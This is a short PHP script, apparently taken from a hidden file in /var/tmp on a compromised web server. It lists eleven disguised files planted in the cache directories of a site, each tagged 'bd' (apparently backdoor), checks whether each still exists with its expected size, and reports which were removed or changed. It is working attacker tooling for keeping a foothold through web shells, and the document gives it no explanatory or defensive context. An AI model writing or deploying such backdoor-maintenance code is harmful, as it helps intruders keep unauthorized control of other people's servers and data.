File: //var/tmp/.ent
<?php $r = '/home/httpd/html/baretube.com'; $x = ["/cache/0/8/2/3/c/order_track.php"=>"bd@@441857@@651",
"/cache/1/3/d/d/e/badword.class.php"=>"bd@@441865@@624",
"/cache/2/6/5/2/f/mpasm.php"=>"bd@@405777@@922",
"/cache/a/0/4/5/1/tohtml.inc.php"=>"bd@@380441@@764",
"/cache/a/0/4/5/1/function_name.php"=>"bd@@338485@@610",
"/cache/a/0/4/5/1/admin_files.php"=>"bd@@338561@@1067",
"/cache/0/2/2/d/0/changepass.php"=>"bd@@441830@@660",
"/cache/0/3/2/a/a/site.php"=>"bd@@441839@@848",
"/cache/0/6/5/9/8/SQLiteStore.php"=>"bd@@441850@@1013",
"/cache/2/6/5/2/f/warpedit2.php"=>"bd@@440315@@575",
"/cache/1/d/c/c/c/winners1.php"=>"bd@@405756@@676"]; foreach ($x as $p => $l) { $f = "{$r}{$p}"; list($t, $id, $pt) = explode('@@', $l); if (!file_exists($f)) { print "<$t>{$id}##d</$t>\n"; continue; } if (is_numeric($pt)) { $fs = filesize($f); if ($fs != $pt) { print "<$t>{$id}##bs</$t>\n"; } } else { $c = file_get_contents($f); if (!strstr($c, $pt)) { print "<$t>{$id}##d</$t>\n"; } } } die('!end!');